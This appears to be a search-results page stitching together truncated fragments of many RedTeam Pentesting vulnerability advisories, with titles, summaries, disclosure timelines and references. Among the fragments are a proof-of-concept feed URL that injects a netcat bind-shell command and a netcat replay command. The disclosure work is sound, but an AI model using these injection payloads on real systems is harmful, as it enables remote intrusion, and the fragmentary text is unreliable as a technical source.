urity. Doing security research RedTeam likes to enhance the
common knowledgebase in security related areas. More information about
RedTeam can be found at http://www.redteam-pentesting.de.
--
RedTeam PentestingTel.: +49-(0)241-963 1300
Dennewartstr. 25-27 Fax : +4
eam offers interested business parties penetration tests to validate
their security. Doing security research RedTeam likes to enhance the
common knowledgebase in security related areas. More information about
RedTeam can be found at http://www.redteam-pentesting.de.
--
RedTeam Pentesting
3-04 Public release
References
==
[1] http://www.auberger.com/pajax/3/
RedTeam
===
RedTeam offers interested business parties penetration tests to validate
their security. Doing security research RedTeam likes to enhance the
common knowledgebase in security related areas. More information
Proof of Concept
====
A minimal malicious server rss feed which exploits the "echo" call may
look as follows:
RedTeam Pentesting Example Malicious Server Feed
http://www.example.com/example.mp3 >> /dev/null; nc
-e /bin/sh -l -p 1337 &#"
le
ever
properly sanitized, so it is possible to include arbitrary shell
commands in the URL which will then be executed using system() (see line
457).
Proof of Concept
====
A minimal malicious server rss feed may look as follows:
RedTeam Pentesting Example Malicious Server Feed
ix
===
Upgrade to version 2.0 RC6
Security Risk
=
The security risk is high because an attacker could gain access to an
administrator account and view and alter the database and hereby
compromise the whole application.
History
===
2006-06-09 Discovery of the problem
2006-06-1
d alter the database and hereby compromise
the whole application.
History
===
2006-06-09 Discovery of the problem
2006-06-10 Vendor is informed
2006-06-12 Vendor released fixed version
References
==
[1] http://www.eschew.net/scripts/phpbe/2.0/
RedTeam
===
RedTeam Pentesting is
13 Vendor is informed
2006-07-14 Vendor releases fixed version
2006-07-20 Advisory is released
References
==
[1] http://www.planetc.de/download/planetgallery/planetgallery.html
RedTeam
===
RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a te
security risc medium. BytesFall Explorer can be
compromised totally when PHP Magic Quotes are not enabled. Though Magic Quotes
do not represent real security, they are a workaround for these problems.
History
===
2006-10-06 Discovery of the vulnerabilities
2006-10-06 Vendor is informed
2006-10-06 Ve
a common
use case for Dovecot and Exim, this configuration is considered to be a
high risk.
History
===
2013-03-05 Vulnerability identified
2013-05-02 Vendor notified
2013-05-02 Vendor confirmed the vulnerability
2013-05-02 Vendor removed the offending line from the Dovecot wiki
2013-05-03 Ad
Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in
Dashboard
RedTeam Pentesting identified an XML external entity expansion
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.
Users with the ability to create new dashboards in the eP
Advisory: rexx Recruitment Cross-Site Scripting in User Registration
RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in rexx Recruitment's user registration page during a penetration test.
If attackers can persuade users to click on a prepared link or
redirected th
Advisory: Metadata Information Disclosure in OrbiTeam BSCW
RedTeam Pentesting discovered an information disclosure vulnerability in
OrbiTeam's BSCW collaboration software. An unauthenticated attacker can
disclose metadata about internal objects which are stored in BSCW.
Details
===
Pr
Advisory: Remote Command Execution in webEdition CMS Installer Script
RedTeam Pentesting discovered a remote command execution vulnerability
in the installer script of the webEdition CMS during a penetration test.
If the installer script is not manually removed after installation,
attackers
Advisory: SQL Injection in webEdition CMS File Browser
RedTeam Pentesting discovered an SQL injection vulnerability in the file
browser component of webEdition CMS during a penetration test.
Unauthenticated attackers can get read-only access on the SQL database
used by webEdition and read for
Advisory: Directory Traversal in DevExpress ASP.NET File Manager
During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.
De
Advisory: Endeca Latitude Cross-Site Request Forgery
RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF)
vulnerability in Endeca Latitude. Using this vulnerability, an attacker
might be able to change several different settings of the Endeca
Latitude instance or disable it entirely
Advisory: Endeca Latitude Cross-Site Scripting
RedTeam Pentesting discovered a Cross-Site Scripting (XSS)
vulnerability in Endeca Latitude. By exploiting this vulnerability an
attacker is able to execute arbitrary JavaScript code in the context
of other Endeca Latitude users.
Details
;s working directory or in its subdirectories.
The CGIHTTPServer code does contain this warning:
"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"
Even when used on a local computer this may allow other local users to
execute code in the context of another use
ntinues to release updated versions, no response
whether the security issue is fixed
2014-11-14 CVE number assigned
2014-12-01 Advisory released
References
==
[1] https://code.google.com/p/wfuzz/
RedTeam Pentesting GmbH
===
RedTeam Pentesting offer
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf
During a penetration test RedTeam Pentesting discovered a remote code
execution vulnerability in the TYPO3 extension ke_dompdf, which allows
attackers to execute arbitrary PHP commands in the context of the
webserver.
Details
ntacted vendor again since no fix or roadmap was provided.
2014-10-28 CVE number requested
2014-11-14 CVE number assigned
2014-12-01 Advisory released
RedTeam Pentesting GmbH
===
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of s
Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager
Mobile Device Management Components
During a penetration test, RedTeam Pentesting discovered that several
IBM Endpoint Manager Components are based on Ruby on Rails and use
static secret_token values. With these
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning
Board 4.0
RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via
?board_url=https://www.redteam-pentesting.de
CVE-2014-8870 was assigned to this issue.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachenhttps://www.redteam-pentesting.de
Germany
TZ!Box 7390
2014-11-14 CVE number assigned
2014-12-08 Vendor provided updated list of affected and fixed models/versions
2014-12-15 Vendor finished releasing fixed versions for all current models
2015-01-21 Advisory released
RedTeam Pentesting GmbH
===
RedTeam Pentesting offers in
Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
Page
During a penetration test, RedTeam Pentesting discovered that the IBM
Endpoint Manager Relay Diagnostics page allows anybody to persistently
store HTML and JavaScript code that is executed when the page is
Advisory: Directory Traversal and Arbitrary File Disclosure in hybris
Commerce Software Suite
During a penetration test, RedTeam Pentesting discovered a Directory
Traversal vulnerability in hybris Commerce software suite. This
vulnerability allows attackers to download arbitrary files
Advisory: Bugzilla: Cross-Site Scripting in Chart Generator
RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability
in Bugzilla's chart generator during a penetration test. If attackers
can persuade users to click on a prepared link or redirected them to
such a link fr
Advisory: Cross-site Scripting in Securimage 3.6.2
RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Securimage CAPTCHA software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.
Details
===
Product: Securimage
Affected Versions
ability
2015-09-04 CVE ID requested
2015-09-24 CVE ID requested again
2015-10-07 CVE ID assigned
2015-10-21 Vendor contacted
2016-04-04 Vendor released fixed version
2016-05-31 Advisory released
References
==
[1] https://www.paessler.com
[2] https://www.paessler.com/prtg/history/stable
Advisory: Websockify: Remote Code Execution via Buffer Overflow
RedTeam Pentesting discovered a buffer overflow vulnerability in the C
implementation of Websockify, which allows attackers to execute
arbitrary code.
Details
===
Product: Websockify C implementation
Affected Versions: all
ther evaluated.
Timeline
2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published
References
==
[1] https://github.com/HadoDokis/Relay-Ajax-Director
Advisory: Less.js: Compilation of Untrusted LESS Files May Lead to Code
Execution through the JavaScript Less Compiler
RedTeam Pentesting discovered behaviour in the Less.js compiler,
which allows execution of arbitrary code if an untrusted LESS file is
compiled.
Details
Advisory: Remote Command Execution in PDNS Manager
RedTeam Pentesting discovered that PDNS Manager is vulnerable to a
remote command execution vulnerability, if for any reason the
configuration file config/config-user.php does not exist.
Details
===
Product: PDNS Manager
Affected Versions
Advisory: Unauthenticated Arbitrary File Disclosure in REDDOXX Appliance
RedTeam Pentesting discovered an arbitrary file disclosure
vulnerability in the REDDOXX appliance software, which allows
unauthenticated attackers to download arbitrary files from the affected
system.
Details
Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in
REDDOXX Appliance
RedTeam Pentesting discovered an arbitrary file disclosure vulnerability
in the REDDOXX appliance software, which allows unauthenticated
attackers to list directory contents and download arbitrary
Advisory: Undocumented Administrative Service Account in REDDOXX Appliance
RedTeam Pentesting discovered an undocumented service account in the
REDDOXX appliance software, which allows attackers to access the
administrative interface of the appliance and change its configuration.
Details
Advisory: Cross-Site Scripting in REDDOXX Appliance
RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the REDDOXX appliance software, which allows attackers to inject
arbitrary JavaScript code via a crafted URL.
Details
===
Product: REDDOXX Appliance
Affected
Advisory: Remote Command Execution as root in REDDOXX Appliance
RedTeam Pentesting discovered a remote command execution vulnerability
in the REDDOXX appliance software, which allows attackers to execute
arbitrary command with root privileges while unauthenticated.
Details
===
Product
Advisory: Unauthenticated Extraction of Session-IDs in REDDOXX Appliance
RedTeam Pentesting discovered an information disclosure vulnerabilty in
the REDDOXX appliance software, which allows unauthenticated attackers
to extract valid session IDs.
Details
===
Product: REDDOXX Appliance
Advisory: Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance
RedTeam Pentesting discovered a vulnerability which allows attackers
unauthenticated access to the diagnostic functions of the administrative
interface of the REDDOXX appliance. The functions allow, for example, to
Advisory: WebClientPrint Processor 2.0: No Validation of TLS Certificates
RedTeam Pentesting discovered that WebClientPrint Processor (WCPP) does
not validate TLS certificates when initiating HTTPS connections. Thus, a
man-in-the-middle attacker may intercept and/or modify HTTPS traffic in
Advisory: WebClientPrint Processor 2.0: Unauthorised Proxy Modification
RedTeam Pentesting discovered that attackers can configure a proxy host
and port to be used when fetching print jobs with WebClientPrint
Processor (WCPP). This proxy setting may be distributed via specially
crafted websites
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Updates
RedTeam Pentesting discovered that rogue updates trigger a remote code
execution vulnerability in WebClientPrint Processor (WCPP). These
updates may be distributed through specially crafted websites and are
processed
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs
RedTeam Pentesting discovered that malicious print jobs can be used to
trigger a remote code execution vulnerability in WebClientPrint
Processor (WCPP). These print jobs may be distributed via specially
crafted websites
Advisory: Alcatel-Lucent OmniSwitch Web Interface Weak Session ID
During a penetration test, RedTeam Pentesting discovered a vulnerability
in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
This interface uses easily guessable session IDs, which allows attackers
to authenticate
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery
During a penetration test, RedTeam Pentesting discovered a vulnerability
in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
The management web interface has no protection against cross-site
request
15-04-08 Vendor announced fixed version available at the end of April
2015-05-13 Requested update from vendor
2015-05-15 Vendor requests more time
2015-05-21 Requested update from vendor
2015-05-22 Vendor states that upload to extension registry doesn't work
2015-06-03 Requested update from
1.70
2015-06-09 Verified that vulnerability is not fixed in version 1.70
2015-06-09 Vendor responded: vulnerability is already known and being
worked on, release date is not known
2015-06-09 Vendor provided list of affected devices
2015-07-10 Vendor queried for update, no response
2015-08-03 Vendor
2015-12-22 Advisory released
References
==
[0] https://github.com/symfony/symfony-demo
[1] https://symfony.com/doc/current/cookbook/security/remember_me.html
[2]
https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature
RedTeam Pentesting GmbH
=
lity is therefore considered to pose a medium risk.
Timeline
2014-10-14 Vulnerability identified
2014-10-16 Vendor notified
2014-11-11 CVE requested
2014-11-11 Vendor announced patch
2014-11-14 CVE number assigned
2014-11-17 Vendor provided fixed version to RedTeam Pentesting
2015-07-16
Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow
RedTeam Pentesting discovered that several models of the AVM FRITZ!Box
are vulnerable to a stack-based buffer overflow, which allows attackers
to execute arbitrary code on the device.
Details
===
Product: AVM FRITZ!Box 3272
ability allows the unauthorised usage of foreign VoIP
telephone numbers. The victim will be charged with all costs resulting
from fraudulent phone calls. Furthermore, an attacker may answer phone
calls on behalf of the victim. Customers have no means of defending
oneself from such an attack. Chances are th
Advisory: SugarCRM list privilege restriction bypass
RedTeam Pentesting discovered a vulnerability in SugarCRM that allows
logged in users to bypass restrictions of their list privilege, allowing
to list all entries.
Details
===
Product: SugarCRM Community Edition
SugarCRM
Advisory: nostromo nhttpd directory traversal leading to arbitrary
command execution
During a penetration test, RedTeam Pentesting discovered a directory
traversal vulnerability leading to arbitrary command execution in the
nostromo HTTP server.
Details
===
Product: nostromo
ce. Therefore the risk is
estimated as high.
History
===
2011-03-07 Vulnerability identified
2011-04-06 Customer approved disclosure to vendor
2011-04-07 Vendor notified
2011-04-07 First reactions of vendor, issue is being investigated
2011-04-08 Meeting with vendor
2011-04-15 Vulnerabili
ally sensitive information (like the
password hashes of all other users). The risk of this vulnerability is
estimated as medium.
History
===
2011-03-07 Vulnerability identified
2011-04-06 Customer approved disclosure to vendor
2011-04-07 Vendor notified
2011-04-08 Meeting with vendor
2011-04-15 V
Advisory: Owl Intranet Engine: Authentication Bypass
During a penetration test, RedTeam Pentesting discovered an
Authentication Bypass vulnerability in the Owl Intranet Engine, which
allows unauthenticated users administrative access to the affected
systems.
Details
===
Product: Owl
Vendor releases new version that does not fix the issue
2011-12-15 Advisory released
RedTeam Pentesting GmbH
===
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company ne
set=UTF-8' \
-H $'SOAPAction: \"http://localhost:/HelloService/soap11/sayhello\";' \
--data-binary $'http://www.w3.org/2001/XMLSchema-instance\";
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\";
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/enve
Advisory: Truncation of SAML Attributes in Shibboleth 2
RedTeam Pentesting discovered that the shibd service of Shibboleth 2
does not extract SAML attribute values in a robust manner. By inserting
XML entities into a SAML response, attackers may truncate attribute
values without breaking the
Advisory: Arbitrary Redirect in Tuleap
RedTeam Pentesting discovered an arbitrary redirect vulnerability in the
redirect mechanism of the application lifecycle management platform
Tuleap.
Details
===
Product: Tuleap
Affected Versions: > 9.17.99.93
Fixed Versions: >= 9.17
Advisory: Shopware Cart Accessible by Third-Party Websites
RedTeam Pentesting discovered that the shopping cart implemented by Shopware
offers an insecure API. Malicious, third-party websites may abuse this API to
list, add or remove products from a user's cart.
Details
===
Pr
age does not contain any random,
unpredictable data. Therefore, it may be replayed at will once captured.
This can be accomplished using netcat:
$ cat logon.bin | nc -v 10.0.0.5 1858
---------
ed "Logon" API method.
Analysis of this token by RedTeam Pentesting revealed, that it consists
of a base64 encoded, serialized .NET object of the type
"CyberArk.Services.Web.SessionIdentifiers". This class consists of four
string attributes which hold information about a user's
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval
RedTeam Pentesting discovered that the Cisco RV320 router exposes
sensitive diagnostic data without authentication through the device's
web interface.
Details
===
Product: Cisco RV320 Dual Gigabit WAN VPN Router, pos
Advisory: Cisco RV320 Command Injection
RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router.
Details
===
Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others
Affected Versions: 1.4.2.15 and
Advisory: Cisco RV320 Unauthenticated Configuration Export
RedTeam Pentesting discovered that the configuration of a Cisco RV320
router may be exported without authentication through the device's web
interface.
Details
===
Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly o
Advisory: Code Execution via Insecure Shell Function getopt_simple
RedTeam Pentesting discovered that the shell function "getopt_simple",
as presented in the "Advanced Bash-Scripting Guide", allows execution of
attacker-controlled commands.
Details
===
Product: Adv
Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval
RedTeam Pentesting discovered that the Cisco RV320 router still exposes
sensitive diagnostic data without authentication via the device's web
interface due to an inadequate fix by the vendor.
Details
===
Product: Cisco
Advisory: Cisco RV320 Command Injection
RedTeam Pentesting discovered a command injection vulnerability in the
web-based certificate generator feature of the Cisco RV320 router which
was inadequately patched by the vendor.
Details
===
Product: Cisco RV320 Dual Gigabit WAN VPN Router
Advisory: Cisco RV320 Unauthenticated Configuration Export
RedTeam Pentesting discovered that the configuration of a Cisco RV320
router can still be exported without authentication via the device's web
interface due to an inadequate fix by the vendor.
Details
===
Product: Cisco RV320
Advisory: Directory Traversal in Cisco Expressway Gateway
RedTeam Pentesting discovered a directory traversal vulnerability in
Cisco Expressway which enables access to administrative web interfaces.
Details
===
Product: Cisco Expressway Gateway
Affected Versions: 11.5.1, possibly others
Advisory: Information Disclosure in REDDOXX Appliance
RedTeam Pentesting discovered an Information Disclosure vulnerability in
the REDDOXX appliance software, which allows unauthenticated attackers
to gain information about the internal network the appliance is part of.
Details
===
Product
Advisory: IceWarp: Cross-Site Scripting in Notes
During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to cross-site scripting attacks in notes
for objects. If attackers with access to the IceWarp system provide a
manipulated object that is displayed by
Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts
During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to user-assisted cross-site scripting
attacks in its contact module. If IceWarp users import a manipulated
vcard, for example from an
using the iTAN system at risk. RedTeam
Pentesting examined chipTAN comfort and showed that even when using this sys-
tem, man-in-the-middle attacks can compromise online banking security.
The full paper is available in German and English at
http://www.redteam-pentesting.de/publications/MitM
layer
protocol used over TLS.
RedTeam Pentesting used the Python module "TLS Lite" to develop proof of concept
code that exploits this vulnerability. It is published at
http://www.redteam-pentesting.de/publications/tls-renegotiation
to raise awareness for the vulnerability and its
Advisory: Geo++(R) GNCASTER: Insecure handling of long URLs
During a penetration test, RedTeam Pentesting discovered that the
GNCASTER software does not handle long URLs correctly. An attacker can
use this to crash the server software or potentially execute code on the
server.
Details
Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data
During a penetration test, RedTeam Pentesting discovered that the
GNCaster software does not handle NMEA-data correctly. An attacker that
has valid login credentials can use this to crash the server software or
potentially execute code
Advisory: Geo++(R) GNCASTER: Faulty implementation of HTTP Digest
Authentication
During a penetration test, RedTeam Pentesting discovered that the
GNCaster software has multiple bugs in its implementation of HTTP Digest
Authentication.
Details
===
Product: Geo++(R) GNCASTER
Advisory: Fujitsu-Siemens ServerView Remote Command Execution
RedTeam Pentesting discovered a remote command execution in the Fujitsu-
Siemens ServerView during a penetration test. The DBAsciiAccess CGI
script is vulnerable to a remote command execution because of a
parameter which is not
Advisory: Fujitsu-Siemens PRIMERGY BX300 Switch Blade Information
Disclosure
RedTeam Pentesting discovered an information disclosure in the Fujitsu-
Siemens BX300 Switch Blade during a penetration test. By accessing URLs
of the web interface directly and aborting the authentication
Advisory: ActiveWeb Contentserver CMS Clientside Filtering of Page
Editor Content
RedTeam Pentesting discovered a design vulnerability in the page editor
of the activeWeb contentserver CMS during a penetration test. Filtering
of user content, e.g. to prevent the usage of Javascript code
Advisory: ActiveWeb Contentserver CMS Editor Permission Settings Problem
RedTeam Pentesting discovered a problem with the permission settings in
the management interface of the activeWeb contentserver CMS during a
penetration test. The ability of an editor to create and edit documents
can be
Advisory: ActiveWeb Contentserver CMS SQL Injection Management Interface
RedTeam Pentesting discovered an SQL Injection in the
picture_real_edit.asp script of the activeWeb contentserver CMS during a
penetration test. An editor with the permission to edit pictures can
exploit this by injecting
Advisory: ActiveWeb Contentserver CMS Multiple Cross Site Scriptings
RedTeam Pentesting discovered three Cross Site Scripting
vulnerabilities in the activeWeb contentserver CMS during a penetration
test. One of the Cross Site Scriptings is persistent.
Details
===
Product: activeWeb
Advisory: Alcatel-Lucent OmniPCX Remote Command Execution
RedTeam Pentesting discovered a remote command execution in the
Alcatel-Lucent OmniPCX during a penetration test. The masterCGI script
of the OmniPXC integrated communication solution web interface is
vulnerable to a remote command
Advisory: SQL-Injections in Mapbender
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in Mapbender. A remote attacker is able to execute
arbitrary SQL commands and therefore can get e.g. valid usernames and
password hashes of the Mapbender users.
Details
Advisory: IceWarp WebMail Server: Client-Side Specification of "Forgot
Password" eMail Content
During a penetration test, RedTeam Pentesting discovered that the emails
sent by the IceWarp WebMail Server when using the "Forgot Password"
function are generate
Advisory: IceWarp WebMail Server: User-assisted Cross Site Scripting in
RSS Feed Reader
During a penetration test, RedTeam Pentesting discovered that the
IceWarp WebMail Server is prone to user-assisted Cross Site Scripting
attacks in its RSS feed reader. If attackers control or
Advisory: IceWarp WebMail Server: SQL Injection in Groupware Component
During a penetration test RedTeam Pentesting discovered multiple
SQL-Injections in the IceWarp WebMail Server. Attackers that are in
control of a user account for the web-based email and groupware
components are able to
Advisory: IceWarp WebMail Server: Cross Site Scripting in Email View
During a penetration test, RedTeam Pentesting discovered that the IceWarp
WebMail Server is prone to Cross Site Scripting attacks in its email view.
This enables attackers to send emails with embedded JavaScript code,
for
d
2009-06-05 Vendor notified
2009-06-30 Vendor releases patch[0]
References
==
[0]
http://www.papoo.de/cms-news-und-infos/security/papoo-sicherheitsmeldung-07-2009.html
RedTeam Pentesting GmbH
===
RedTeam Pentesting is offering individual penetration tests, short
pent
95 matches
Mail list logo
